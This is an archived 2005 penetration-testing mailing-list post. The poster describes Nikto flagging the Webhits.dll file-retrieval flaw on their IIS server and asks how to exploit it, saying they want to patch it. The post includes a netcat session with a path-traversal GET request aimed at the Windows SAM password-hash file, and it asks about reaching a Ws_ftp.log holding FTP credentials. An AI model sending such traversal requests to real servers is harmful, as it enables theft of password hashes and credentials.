Penetration Testing mailing list archives
Webhits.dll arbitrary file retrieval Vulnerability
From: Maverick The Techie <seclists4maverick () gmail com>
Date: Thu, 3 Mar 2005 12:55:22 +0530
Respected Members, when i was doing a web server scan through Nikto on my website, it reported that the files "/scripts/samples/search/qfullhit.htw" & "/scripts/samples/search/qsumrhit.htw" are vulnerable to the "Webhits.dll arbitrary file retrieval Vulnerability " When i researched on Google, i found this bug's advisory by David Litchfield and he says that "Even if you have no .htw files on your system you"re probably still vulnerable! A quick test to show if you are vulnerable: go to http://YOUR_WEB_SERVER_ADDRESS_HERE/nosuchfile.htw If you receive a message stating the "format of the QUERY_STRING is invalid" you _are_ vulnerable." when i typed this Url into IE,(www.acme.com/nosuchfile.htw) i got the this response "The format of QUERY_STRING is invalid." which proved that the web server was vulnerable to this vulnerability. so i tried to exploit it via netcat by reading the rest of the advisory so i tried this in netcat E:\nc11nt>nc -v -n 202.xx.xx.208 80 (UNKNOWN) [202.xx.xx.208] 80 (?) open GET /scripts/samples/search/qfullhit.htw?ciwebhitsfile=/../../winnt/repair/sam._ &cirestriction=none&cihilitetype=full HTTP/1.0 200 OK Content-Type: text/html <HTML> <BODY> <p><h3><center>The path specified is incorrect.<BR></center></h3><BR></BODY> </HTML> E:\nc11nt> Though, i could not retrieve the sam file hashes, i still got a HTTP 200 Ok message, now Nikto also says that there is a "Ws_ftp.log" file on the server, now i dont have any clue on this file and its location on the server, some admin say that it contains the FTP user id and encrypted password which is way easy to crack!!, now is there a way that i can access that log file through the above vulnerability, or any other files for that matter coz whatever files i have tried to access using the above way i have got nothing but HTTP OK messages. I request u all to kindly explain the method to exploit this bug and access files, coz i am unable to exploit this vulnerability in a proper way so unless i know how this bug is exploited, i cannot patch it coz i want to know how to exploit it first before patching it so that i can know all the avenues what a cracker can use to enter my web server. Any Help would be certainly appreciated. -=Maverick_12210=-
Current thread:
- Webhits.dll arbitrary file retrieval Vulnerability Maverick The Techie (Mar 03)
- Re: Webhits.dll arbitrary file retrieval Vulnerability H D Moore (Mar 03)
- <Possible follow-ups>
- Re: Webhits.dll arbitrary file retrieval Vulnerability Jian Hui Wang (Mar 03)